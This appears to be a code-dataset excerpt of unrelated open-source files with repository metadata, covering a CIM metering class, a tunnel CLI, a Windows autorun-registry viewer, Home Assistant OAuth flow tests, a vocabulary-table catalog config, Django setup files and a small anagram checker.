] | permissive | fran-jo/PyCIM | 355e36ae14d1b64b01e752c5acd5395bf88cd949 | de942633d966bdf2bd76d680ecb20517fc873281 | refs/heads/master | 2021-01-20T03:00:41.186556 | 2017-09-19T14:15:33 | 2017-09-19T14:15:33 | 89,480,767 | 0 | 1 | null | 2017-04-26T12:57:44 | 2017-04-26T12:57:44 | null | UTF-8 | Python | false | false | 3,308 | py | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM16.IEC61968.Metering.EndDeviceFunction import EndDeviceFunction
class ComFunction(EndDeviceFunction):
    """Communication function of communication equipment or a device such as
    a meter (CIM16 IEC61968 Metering).
    """

    def __init__(self, amrRouter='', amrAddress='', twoWay=False, *args, **kw_args):
        """Initialises a new 'ComFunction' instance.

        @param amrRouter: Communication ID number (e.g. port number, serial number, data collector ID, etc.) of the parent device associated to this AMR module. Note: If someone swaps out a meter, they may inadvertently disrupt the AMR system. Some technologies route readings from nearby meters through a common collection point on an electricity meter. Removal of such a meter disrupts AMR for numerous nearby meters.
        @param amrAddress: Communication ID number (e.g. serial number, IP address, telephone number, etc.) of the AMR module which serves this meter.
        @param twoWay: True when the AMR module can both send and receive messages. Default is false (i.e., module can only send).
        """
        #: Communication ID number (e.g. port number, serial number, data collector ID, etc.) of the parent device associated to this AMR module. Note: If someone swaps out a meter, they may inadvertently disrupt the AMR system. Some technologies route readings from nearby meters through a common collection point on an electricity meter. Removal of such a meter disrupts AMR for numerous nearby meters.
        self.amrRouter = amrRouter

        #: Communication ID number (e.g. serial number, IP address, telephone number, etc.) of the AMR module which serves this meter.
        self.amrAddress = amrAddress

        #: True when the AMR module can both send and receive messages. Default is false (i.e., module can only send).
        self.twoWay = twoWay

        super(ComFunction, self).__init__(*args, **kw_args)

    # Class-level reflection metadata, presumably consumed by PyCIM's
    # (de)serialisation machinery -- keep in sync with the attributes above.
    _attrs = ["amrRouter", "amrAddress", "twoWay"]                      # simple attributes
    _attr_types = {"amrRouter": str, "amrAddress": str, "twoWay": bool}  # attribute -> type
    _defaults = {"amrRouter": '', "amrAddress": '', "twoWay": False}     # attribute -> default
    _enums = {}        # no enumerated attributes
    _refs = []         # no references to other CIM objects
    _many_refs = []    # no one-to-many references
| [
"fran_jo@hotmail.com"
] | fran_jo@hotmail.com |
f82ef33cd4738f58765f3bcd648b1aa0d96dccc1 | 7f0c02b3eef636cc382484dd8015207c35cc83a8 | /lib/python/treadmill/sproc/warpgate.py | 95edca71b68bbd55ec900b55895d40d054d10f07 | [
"Apache-2.0"
] | permissive | ceache/treadmill | 4efa69482dafb990978bfdcb54b24c16ca5d1147 | 26a1f667fe272ff1762a558acfd66963494020ca | refs/heads/master | 2021-01-12T12:44:13.474640 | 2019-08-20T23:22:37 | 2019-08-20T23:22:37 | 151,146,942 | 0 | 0 | Apache-2.0 | 2018-10-01T19:31:51 | 2018-10-01T19:31:51 | null | UTF-8 | Python | false | false | 1,587 | py | """Warpgate client CLI.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import click
from treadmill import cli
from treadmill.warpgate import client
_LOGGER = logging.getLogger(__name__)
def init():
    """Top level command handler.

    Builds and returns the `warpgate` click command; the command name is
    derived from the inner function's name, so it must stay `warpgate`.
    """

    @click.command()
    @click.option('--policy-servers', type=cli.LIST,
                  required=True,
                  help='Warpgate policy servers')
    @click.option('--service-principal', type=str,
                  default='host',
                  help='Warpgate service principal.')
    @click.option('--policy', type=str, required=True,
                  envvar='WARPGATE_POLICY',
                  help='Warpgate policy to use')
    @click.option('--tun-dev', type=str, required=True,
                  help='Device to use when establishing tunnels.')
    @click.option('--tun-addr', type=str, required=False,
                  help='Local IP address to use when establishing tunnels.')
    def warpgate(policy_servers, service_principal, policy, tun_dev, tun_addr):
        """Run warpgate connection manager.
        """
        # NOTE: fixed help-text typo above ('Warpget' -> 'Warpgate').
        _LOGGER.info(
            'Launch client => %s, tunnel: %s[%s], policy: %s, principal: %s',
            policy_servers,
            tun_dev, tun_addr,
            policy,
            service_principal,
        )

        # Never exits
        client.run_client(
            policy_servers, service_principal, policy,
            tun_dev, tun_addr
        )

    return warpgate
| [
"ceache@users.noreply.github.com"
] | ceache@users.noreply.github.com |
2b4389ecb7063df9de2c1a85552f21e19513c7d6 | da99b8e2a22318f1cafb0c78adb17c8fdebe01df | /PythonBookAdditional/第12章 Windows系统编程/code/CheckAndViewAutoRunsInSystem.py | 63a8ea52863a56fe57da939232caf9e2e9061c8b | [
"MIT"
] | permissive | lsjsss/PythonClass | f185873113d54ed6ae9b3ccc22cc5a71bf8f611d | 0d38d2ca4d14d5e0e2062e22ae2dbbefea279179 | refs/heads/master | 2023-02-18T13:43:32.453478 | 2023-02-08T07:17:09 | 2023-02-08T07:17:09 | 247,711,629 | 0 | 0 | null | 2022-04-25T07:03:53 | 2020-03-16T13:38:15 | Python | UTF-8 | Python | false | false | 1,579 | py | #check and view autoruns in the system
from win32api import *
from win32con import *
def GetValues(fullname):
    """Print every value name/data pair stored under a full registry path.

    `fullname` is e.g. 'HKEY_LOCAL_MACHINE\\SOFTWARE\\...\\Run'; the part
    before the first backslash selects the predefined root key.
    """
    # Split into root-key name and sub-key path (at most one split).
    name = fullname.split('\\', 1)
    try:
        if name[0] == 'HKEY_LOCAL_MACHINE':
            key = RegOpenKey(HKEY_LOCAL_MACHINE, name[1], 0, KEY_READ)
        elif name[0] == 'HKEY_CURRENT_USER':
            key = RegOpenKey(HKEY_CURRENT_USER, name[1], 0, KEY_READ)
        elif name[0] == 'HKEY_CLASSES_ROOT':
            # BUG FIX: the original tested for the nonexistent root
            # 'HKEY_CURRENT_ROOT' and referenced the undefined constant
            # HKEY_CURRENT_ROOT, whose NameError was silently swallowed below.
            key = RegOpenKey(HKEY_CLASSES_ROOT, name[1], 0, KEY_READ)
        elif name[0] == 'HKEY_CURRENT_CONFIG':
            key = RegOpenKey(HKEY_CURRENT_CONFIG, name[1], 0, KEY_READ)
        elif name[0] == 'HKEY_USERS':
            key = RegOpenKey(HKEY_USERS, name[1], 0, KEY_READ)
        else:
            print('Error, no key named ', name[0])
            # BUG FIX: without this return, `key` was unbound and the code
            # below raised a (swallowed) NameError after the error message.
            return
        # RegQueryInfoKey -> (num_subkeys, num_values, last_modified).
        info = RegQueryInfoKey(key)
        for i in range(0, info[1]):
            ValueName = RegEnumValue(key, i)
            print(ValueName[0].ljust(20), ValueName[1])
        RegCloseKey(key)
    except Exception as e:
        # Narrowed from BaseException so Ctrl-C (KeyboardInterrupt) still works.
        print('Sth is wrong')
        print(e)
if __name__=='__main__':
    # Registry locations that Windows uses to auto-start programs at login
    # (HKLM = all users, HKCU = current user only).
    KeyNames=['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run',
              'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce',
              'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx',
              'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
              'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce']
    for KeyName in KeyNames:
        print(KeyName)
        GetValues(KeyName)
| [
"lsjsss@live.cn"
] | lsjsss@live.cn |
6e2dd713422373ca3f97052be06e0a16981f04f9 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/cloud/aiplatform/v1/aiplatform-v1-py/google/cloud/aiplatform/v1/schema/predict/instance_v1/types/video_classification.py | 2a302fc41f2bfb1ed6a3bebcbc1e33f705293c69 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
# Registers this module's message classes under the given proto package; the
# manifest lists every message defined in this file.
__protobuf__ = proto.module(
    package='google.cloud.aiplatform.v1.schema.predict.instance',
    manifest={
        'VideoClassificationPredictionInstance',
    },
)


class VideoClassificationPredictionInstance(proto.Message):
    r"""Prediction input format for Video Classification.

    Attributes:
        content (str):
            The Google Cloud Storage location of the
            video on which to perform the prediction.
        mime_type (str):
            The MIME type of the content of the video.
            Only the following are supported: video/mp4
            video/avi video/quicktime
        time_segment_start (str):
            The beginning, inclusive, of the video's time
            segment on which to perform the prediction.
            Expressed as a number of seconds as measured
            from the start of the video, with "s" appended
            at the end. Fractions are allowed, up to a
            microsecond precision.
        time_segment_end (str):
            The end, exclusive, of the video's time
            segment on which to perform the prediction.
            Expressed as a number of seconds as measured
            from the start of the video, with "s" appended
            at the end. Fractions are allowed, up to a
            microsecond precision, and "inf" or "Infinity"
            is allowed, which means the end of the video.
    """

    # Field numbers (1-4) must stay stable for wire compatibility.
    content = proto.Field(proto.STRING, number=1)

    mime_type = proto.Field(proto.STRING, number=2)

    time_segment_start = proto.Field(proto.STRING, number=3)

    time_segment_end = proto.Field(proto.STRING, number=4)


# Public API of this module: every name listed in the proto manifest.
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
8a9a097acec7f7248d2a0353f0e6c921b0e9d855 | 7298d1692c6948f0880e550d6100c63a64ce3ea1 | /deriva-annotations/catalog1/catalog-configs/Vocab/ihm_external_reference_info_reference_type_term.py | bfd555a03816d7b8e5783424965c8f5f426649a4 | [] | no_license | informatics-isi-edu/protein-database | b7684b3d08dbf22c1e7c4a4b8460248c6f0d2c6d | ce4be1bf13e6b1c22f3fccbb513824782609991f | refs/heads/master | 2023-08-16T10:24:10.206574 | 2023-07-25T23:10:42 | 2023-07-25T23:10:42 | 174,095,941 | 2 | 0 | null | 2023-06-16T19:44:43 | 2019-03-06T07:39:14 | Python | UTF-8 | Python | false | false | 6,342 | py | import argparse
from deriva.core import ErmrestCatalog, AttrDict, get_credential, DerivaPathError
from deriva.utils.catalog.components.deriva_model import DerivaCatalog
import deriva.core.ermrest_model as em
from deriva.core.ermrest_config import tag as chaise_tags
from deriva.utils.catalog.manage.update_catalog import CatalogUpdater, parse_args
# Globus group URIs referenced by the ACLs / ACL bindings defined below.
groups = {
    'pdb-reader': 'https://auth.globus.org/8875a770-3c40-11e9-a8c8-0ee7d80087ee',
    'pdb-writer': 'https://auth.globus.org/c94a1e5c-3c40-11e9-a5d1-0aacc65bfe9a',
    'pdb-admin': 'https://auth.globus.org/0b98092c-3c41-11e9-a8c8-0ee7d80087ee',
    'pdb-curator': 'https://auth.globus.org/eef3e02a-3c40-11e9-9276-0edc9bdd56a6',
    'isrd-staff': 'https://auth.globus.org/176baec4-ed26-11e5-8e88-22000ab4b42b'
}

# Fully-qualified target table: Vocab.ihm_external_reference_info_reference_type_term
table_name = 'ihm_external_reference_info_reference_type_term'

schema_name = 'Vocab'

# Per-column Chaise annotations: the ERMrest system columns (RCT/RMT/RCB/RMB)
# get friendly display names and are marked generated/immutable in the UI.
column_annotations = {
    'RCT': {
        chaise_tags.display: {
            'name': 'Creation Time'
        },
        chaise_tags.generated: None,
        chaise_tags.immutable: None
    },
    'RMT': {
        chaise_tags.display: {
            'name': 'Last Modified Time'
        },
        chaise_tags.generated: None,
        chaise_tags.immutable: None
    },
    'RCB': {
        chaise_tags.display: {
            'name': 'Created By'
        },
        chaise_tags.generated: None,
        chaise_tags.immutable: None
    },
    'RMB': {
        chaise_tags.display: {
            'name': 'Modified By'
        },
        chaise_tags.generated: None,
        chaise_tags.immutable: None
    },
    'ID': {},
    'URI': {},
    'Name': {},
    'Description': {},
    'Synonyms': {},
    'Owner': {}
}

# Human-readable comments attached to each user-defined column.
column_comment = {
    'ID': 'The preferred Compact URI (CURIE) for this term.',
    'URI': 'The preferred URI for this term.',
    'Name': 'The preferred human-readable name for this term.',
    'Description': 'A longer human-readable description of this term.',
    'Synonyms': 'Alternate human-readable names for this term.',
    'Owner': 'Group that can update the record.'
}

# No column-level ACLs or dynamic ACL bindings; table-level rules apply.
column_acls = {}

column_acl_bindings = {}
# ERMrest column definitions for the vocabulary term table. `ID` and `URI`
# default to templates that ERMrest expands from the generated row RID.
column_defs = [
    em.Column.define(
        'ID',
        em.builtin_types['ermrest_curie'],
        nullok=False,
        default='PDB:{RID}',
        comment=column_comment['ID'],
    ),
    em.Column.define(
        'URI',
        em.builtin_types['ermrest_uri'],
        nullok=False,
        default='/id/{RID}',
        comment=column_comment['URI'],
    ),
    em.Column.define(
        'Name', em.builtin_types['text'], nullok=False, comment=column_comment['Name'],
    ),
    em.Column.define(
        'Description',
        em.builtin_types['markdown'],
        nullok=False,
        comment=column_comment['Description'],
    ),
    em.Column.define('Synonyms', em.builtin_types['text[]'], comment=column_comment['Synonyms'],
                     ),
    em.Column.define('Owner', em.builtin_types['text'], comment=column_comment['Owner'],
                     ),
]
# Column order/visibility used by Chaise for every display context ('*');
# foreign keys are referenced by their (schema, constraint-name) pair.
visible_columns = {
    '*': [
        'RID', 'Name', 'Description', 'ID', 'URI',
        ['Vocab', 'ihm_external_reference_info_reference_type_term_RCB_fkey'],
        ['Vocab', 'ihm_external_reference_info_reference_type_term_RMB_fkey'], 'RCT', 'RMT',
        ['Vocab', 'ihm_external_reference_info_reference_type_term_Owner_fkey']
    ]
}

# Rows are titled by their Name value in Chaise.
table_display = {'row_name': {'row_markdown_pattern': '{{{Name}}}'}}

table_annotations = {
    chaise_tags.table_display: table_display,
    chaise_tags.visible_columns: visible_columns,
}

# NOTE(review): 'vocabular' looks like a typo for 'vocabulary'; left as-is
# because this string is stored in the catalog and changing it would diff
# against existing deployments.
table_comment = 'A set of controlled vocabular terms.'

table_acls = {}

# Rows may be updated/deleted either by their Owner group or by the client
# that created them (RCB).
table_acl_bindings = {
    'self_service_group': {
        'types': ['update', 'delete'],
        'scope_acl': ['*'],
        'projection': ['Owner'],
        'projection_type': 'acl'
    },
    'self_service_creator': {
        'types': ['update', 'delete'],
        'scope_acl': ['*'],
        'projection': ['RCB'],
        'projection_type': 'acl'
    }
}
# Uniqueness constraints: RID (system), ID, and URI must each be unique.
key_defs = [
    em.Key.define(
        ['RID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RIDkey1')],
    ),
    em.Key.define(
        ['ID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_IDkey1')],
    ),
    em.Key.define(
        ['URI'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_URIkey1')],
    ),
]

# Foreign keys: Owner -> public.Catalog_Group (curators may reassign; a
# dynamic binding lets members set Owner to a group they belong to), and
# RCB/RMB -> public.ERMrest_Client (freely settable provenance columns).
fkey_defs = [
    em.ForeignKey.define(
        ['Owner'],
        'public',
        'Catalog_Group', ['ID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_Owner_fkey')],
        acls={
            'insert': [groups['pdb-curator']],
            'update': [groups['pdb-curator']]
        },
        acl_bindings={
            'set_owner': {
                'types': ['update', 'insert'],
                'scope_acl': ['*'],
                'projection': ['ID'],
                'projection_type': 'acl'
            }
        },
    ),
    em.ForeignKey.define(
        ['RCB'],
        'public',
        'ERMrest_Client', ['ID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RCB_fkey')],
        acls={
            'insert': ['*'],
            'update': ['*']
        },
    ),
    em.ForeignKey.define(
        ['RMB'],
        'public',
        'ERMrest_Client', ['ID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RMB_fkey')],
        acls={
            'insert': ['*'],
            'update': ['*']
        },
    ),
]
# Assemble the complete ERMrest table definition; provide_system=True adds
# the standard RID/RCT/RMT/RCB/RMB system columns automatically.
table_def = em.Table.define(
    table_name,
    column_defs=column_defs,
    key_defs=key_defs,
    fkey_defs=fkey_defs,
    annotations=table_annotations,
    acls=table_acls,
    acl_bindings=table_acl_bindings,
    comment=table_comment,
    provide_system=True
)
def main(catalog, mode, replace=False, really=False):
    """Create or update the vocabulary table in the target catalog.

    `mode`, `replace`, and `really` are interpreted by
    CatalogUpdater.update_table (whether to create, update, or replace the
    table definition, and whether destructive changes are confirmed).
    """
    updater = CatalogUpdater(catalog)
    # em.Table.define() does not carry these mappings, so attach them to the
    # definition dict before applying it to the catalog.
    table_def['column_annotations'] = column_annotations
    table_def['column_comment'] = column_comment
    updater.update_table(mode, schema_name, table_def, replace=replace, really=really)
if __name__ == "__main__":
    # Defaults target catalog 1 on pdb.isrd.isi.edu; parse_args may override
    # host/catalog id and returns the requested mode and replace flag.
    host = 'pdb.isrd.isi.edu'
    catalog_id = 1
    mode, replace, host, catalog_id = parse_args(host, catalog_id, is_table=True)
    catalog = DerivaCatalog(host, catalog_id=catalog_id, validate=False)
    main(catalog, mode, replace)
| [
"brinda.vallat@rcsb.org"
] | brinda.vallat@rcsb.org |
97590902ea45bc7e04b8feaeccdb37e092426808 | 3520f9f1b6d804a6d95233493972bf04dca67fb4 | /revisited_2021/math_and_string/valid_anagram.py | 0d690178b7d6f34a5c35933bc51c1c498ce42777 | [] | no_license | Shiv2157k/leet_code | 8691a470148809f0a7077434abdc689f33958f34 | 65cc78b5afa0db064f9fe8f06597e3e120f7363d | refs/heads/master | 2023-06-17T02:59:20.892561 | 2021-07-05T16:42:58 | 2021-07-05T16:42:58 | 266,856,709 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py |
class Anagram:
    def is_valid(self, s: str, t: str):
        """Return True when `t` is an anagram of `s`.

        Single pass over both strings, maintaining a fixed 26-slot tally of
        letter-count differences (assumes lowercase ASCII letters).
        Time O(N), space O(1).
        """
        if len(s) != len(t):
            return False
        balance = [0] * 26
        base = ord("a")
        for a, b in zip(s, t):
            balance[ord(a) - base] += 1
            balance[ord(b) - base] -= 1
        # All differences cancel out exactly when t is an anagram of s.
        return not any(balance)
if __name__ == "__main__":
    # Manual smoke test; expected output: True, True, False.
    anagram = Anagram()
    print(anagram.is_valid("rat", "tar"))
    print(anagram.is_valid("", ""))
print(anagram.is_valid("a", "b")) | [
"shiv2157.k@gmail.com"
] | shiv2157.k@gmail.com |
c0d577a00e14252c2e94df73db2729d4a5836254 | 5963c12367490ffc01c9905c028d1d5480078dec | /tests/components/home_plus_control/test_config_flow.py | 4a7dbd3d3ee4e3f02c6a53aa014845151bec6ce1 | [
"Apache-2.0"
] | permissive | BenWoodford/home-assistant | eb03f73165d11935e8d6a9756272014267d7d66a | 2fee32fce03bc49e86cf2e7b741a15621a97cce5 | refs/heads/dev | 2023-03-05T06:13:30.354545 | 2021-07-18T09:51:53 | 2021-07-18T09:51:53 | 117,122,037 | 11 | 6 | Apache-2.0 | 2023-02-22T06:16:51 | 2018-01-11T16:10:19 | Python | UTF-8 | Python | false | false | 6,431 | py | """Test the Legrand Home+ Control config flow."""
from unittest.mock import patch
from homeassistant import config_entries, data_entry_flow, setup
from homeassistant.components.home_plus_control.const import (
CONF_SUBSCRIPTION_KEY,
DOMAIN,
OAUTH2_AUTHORIZE,
OAUTH2_TOKEN,
)
from homeassistant.const import CONF_CLIENT_ID, CONF_CLIENT_SECRET
from homeassistant.helpers import config_entry_oauth2_flow
from tests.common import MockConfigEntry
from tests.components.home_plus_control.conftest import (
CLIENT_ID,
CLIENT_SECRET,
SUBSCRIPTION_KEY,
)
async def test_full_flow(
hass, aiohttp_client, aioclient_mock, current_request_with_host
):
"""Check full flow."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
state = config_entry_oauth2_flow._encode_jwt( # pylint: disable=protected-access
hass,
{
"flow_id": result["flow_id"],
"redirect_uri": "https://example.com/auth/external/callback",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_EXTERNAL_STEP
assert result["step_id"] == "auth"
assert result["url"] == (
f"{OAUTH2_AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
"&redirect_uri=https://example.com/auth/external/callback"
f"&state={state}"
)
client = await aiohttp_client(hass.http.app)
resp = await client.get(f"/auth/external/callback?code=abcd&state={state}")
assert resp.status == 200
assert resp.headers["content-type"] == "text/html; charset=utf-8"
aioclient_mock.post(
OAUTH2_TOKEN,
json={
"refresh_token": "mock-refresh-token",
"access_token": "mock-access-token",
"type": "Bearer",
"expires_in": 60,
},
)
with patch(
"homeassistant.components.home_plus_control.async_setup_entry",
return_value=True,
) as mock_setup:
result = await hass.config_entries.flow.async_configure(result["flow_id"])
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "Home+ Control"
config_data = result["data"]
assert config_data["token"]["refresh_token"] == "mock-refresh-token"
assert config_data["token"]["access_token"] == "mock-access-token"
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert len(mock_setup.mock_calls) == 1
async def test_abort_if_entry_in_progress(hass, current_request_with_host):
"""Check flow abort when an entry is already in progress."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
# Start one flow
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
# Attempt to start another flow
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_in_progress"
async def test_abort_if_entry_exists(hass, current_request_with_host):
"""Check flow abort when an entry already exists."""
existing_entry = MockConfigEntry(domain=DOMAIN)
existing_entry.add_to_hass(hass)
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
"http": {},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "single_instance_allowed"
async def test_abort_if_invalid_token(
hass, aiohttp_client, aioclient_mock, current_request_with_host
):
"""Check flow abort when the token has an invalid value."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
state = config_entry_oauth2_flow._encode_jwt( # pylint: disable=protected-access
hass,
{
"flow_id": result["flow_id"],
"redirect_uri": "https://example.com/auth/external/callback",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_EXTERNAL_STEP
assert result["step_id"] == "auth"
assert result["url"] == (
f"{OAUTH2_AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
"&redirect_uri=https://example.com/auth/external/callback"
f"&state={state}"
)
client = await aiohttp_client(hass.http.app)
resp = await client.get(f"/auth/external/callback?code=abcd&state={state}")
assert resp.status == 200
assert resp.headers["content-type"] == "text/html; charset=utf-8"
aioclient_mock.post(
OAUTH2_TOKEN,
json={
"refresh_token": "mock-refresh-token",
"access_token": "mock-access-token",
"type": "Bearer",
"expires_in": "non-integer",
},
)
result = await hass.config_entries.flow.async_configure(result["flow_id"])
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "oauth_error"
| [
"noreply@github.com"
] | BenWoodford.noreply@github.com |
64ab6dc9d426016042fc73847036810389e9d621 | 1f244254465ce36f116b7d1c255f9a9ae9594bb4 | /typeidea/typeidea/wsgi.py | 859bfc426728341b7d6955eef2c8ef45d9865831 | [] | no_license | sunye088/typeidea | a45e7093b3b553fd38a5a6ba1971a7e3651cb161 | 2b84392e926fd72b1975947626db7362f0729a5c | refs/heads/master | 2023-04-29T15:20:18.049406 | 2019-11-30T13:31:39 | 2019-11-30T13:31:39 | 226,258,490 | 0 | 0 | null | 2023-04-21T20:41:54 | 2019-12-06T06:10:25 | Python | UTF-8 | Python | false | false | 532 | py | """
WSGI config for typeidea project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'typeidea.settings')
profile =os.environ.get('TYPEIDEA_PROFILE', 'develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "typeidea.settings.%s" % profile)
application = get_wsgi_application()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
4bc76b786fe6931ca452ac6acf19df76b08600dd | 2898e585a2396738e49e33d322e8c65c823e6cf8 | /content/migrations/0073_comment.py | 0db929fda7cd4c263f7df602e0253eea7adf4179 | [] | no_license | kshutashvili/carshops | 4a4f384856c7cae6d09c9ca6e8b6c703ab88be80 | 885c6ed85d33c1cc9333ef9d224a3000b08959dc | refs/heads/master | 2022-12-12T12:50:49.618195 | 2018-02-22T18:04:00 | 2018-02-22T18:04:00 | 203,865,092 | 0 | 0 | null | 2022-11-22T02:24:12 | 2019-08-22T20:06:14 | JavaScript | UTF-8 | Python | false | false | 2,007 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-02-21 15:32
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import mptt.fields
class Migration(migrations.Migration):
dependencies = [
('content', '0072_auto_20180220_1531'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, verbose_name='\u0418\u043c\u044f \u0442\u043e\u0433\u043e, \u043a\u0442\u043e \u043e\u0441\u0442\u0430\u0432\u0438\u043b \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439')),
('date', models.DateField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430')),
('content', models.TextField(verbose_name='\u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='subitems', to='content.Comment', verbose_name='\u0420\u043e\u0434\u0438\u0442\u0435\u043b\u044c')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='content.Product', verbose_name='\u0422\u043e\u0432\u0430\u0440')),
],
options={
'verbose_name': '\u041e\u0442\u0437\u044b\u0432',
'verbose_name_plural': '\u041e\u0442\u0437\u044b\u0432\u044b',
},
),
]
| [
"vetal969696@gmail.com"
] | vetal969696@gmail.com |
c6f06eb98d128fd78f6d7854db6a54d8e17d525b | e4fcd551a9d83e37a2cd6d5a2b53a3cc397ccb10 | /codes/eval_metrics/writing/mmocr/tests/test_datasets/test_preparers/test_parsers/test_wildreceipt_parsers.py | f4e5510db441116c73cc4881d23d270c83338ff1 | [
"Apache-2.0"
] | permissive | eslambakr/HRS_benchmark | 20f32458a47c6e1032285b44e70cf041a64f842c | 9f153d8c71d1119e4b5c926b899bb556a6eb8a59 | refs/heads/main | 2023-08-08T11:57:26.094578 | 2023-07-22T12:24:51 | 2023-07-22T12:24:51 | 597,550,499 | 33 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,991 | py | # Copyright (c) OpenMMLab. All rights reserved.
import json
import os.path as osp
import tempfile
import unittest
